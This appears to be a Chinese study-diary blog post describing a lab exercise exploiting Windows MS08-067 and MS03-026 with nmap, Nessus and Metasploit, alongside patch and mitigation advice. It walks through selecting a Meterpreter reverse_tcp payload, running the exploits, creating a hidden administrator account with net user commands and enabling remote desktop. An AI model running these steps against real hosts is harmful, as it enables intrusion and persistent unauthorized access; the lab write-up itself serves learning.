2018-08-09 Windows系统提权

今天主要学了如何利用windows操作系统的漏洞进行后门提权。主要用到的工具有nessus、metasploit、nmap。主要是使用了MS08_067和MS03_026两个漏洞进行实验。

nessus。Nessus 是目前全世界最多人使用的系统漏洞扫描与分析软件。总共有超过75,000个机构使用Nessus 作为扫描该机构电脑系统的软件。


【漏洞名称】

MS08-067:Microsoft Windows Server Service Crafted RPC Request Handling Remote Code Execution(958644)(ECLIPSEDWING)(uncredentialed check)

【漏洞描述】

由于RPC请求处理不当,远程Windows主机受“服务器”服务中的远程执行代码漏洞影响。未经身份验证的远程攻击者可以通过特制的RPC请求利用此功能来执行具有“系统”权限的任意代码。ECLIPSEDWING是2017/04/14由一个名为Shadow Brokers的团体披露的多个Equation Group漏洞和漏洞之一

【解决措施】

1、更新打补丁,微软已经发布了相关补丁

2、普通用户可以将系统设置为禁止发起连接模式,阻断所有向本主机发起的连接

3、不需要开放RPC服务的服务器用户,可以设置TCP/IP筛选,只要不允许TCP139和445端口访问,漏洞就失效了

4、需要开放RPC服务的服务器用户可以打开DEP安全策略,或者安装主机IPS

【漏洞验证】

1、首先使用nmap扫描当前局域网内存活的主机,确定靶机,命令nmap -sV 10.10.10.0/24

2、确定目标主机为10.10.10.130,然后使用nessus扫描该ip,扫描出可利用的系统漏洞

3、确定要利用MS08-067之后,使用metasploit搜索可利用模块,search ms08_067

4、然后使用命令show payloads,选择攻击载荷windows/meterpreter/reverse_tcp

5、设置参数,rhost为10.10.10.130,lhost为10.10.10.128,target为3

6、exploit开始攻击。

2018-08-09 Windows系统提权_第1张图片
攻击成功界面截图

【漏洞名称】

MS03-026: Microsoft RPC Interface Buffer Overrun (823980) (uncredentialed check)

【漏洞描述】

远程版本的Windows在其RPC接口中包含RemoteActivation()函数中的一个缺陷,该漏洞可能允许攻击者使用SYSTEM权限在远程主机上执行任意代码。

众所周知,一系列蠕虫(Blaster)会在野外利用此漏洞。

【解决措施】

1、更新打补丁,微软已经发布了相关补丁

2、安装第三方杀毒软件,以及入侵检测系统

3、配置防火墙和安全策略

4、关闭RPC服务等

【漏洞验证】

1、使用metasploit,输入命令search ms03_026,搜索利用模块并使用

2、设置参数,rhost为10.10.10.130,lhost为10.10.10.128,payload为windows/meterpreter/reverse_tcp,target只有一个,不用选,然后exploit,开始攻击

3、攻击成功后,输入shell,进入windows的一个命令行,可以执行任何系统指令,然后输入net user kotw windows /add;net localgroup administrators kotw /add,创建一个具有管理员权限的账户

4、exit命令退出shell,执行run getgui -e命令,使用meterpreter的强大功能开启靶机的远程桌面服务

5、打开一个终端,输入rdesktop 10.10.10.130,打开远程桌面连接,然后输入创建的账户密码,即可成功进入。

2018-08-09 Windows系统提权_第2张图片
完成界面截图

你可能感兴趣的:(2018-08-09 Windows系统提权)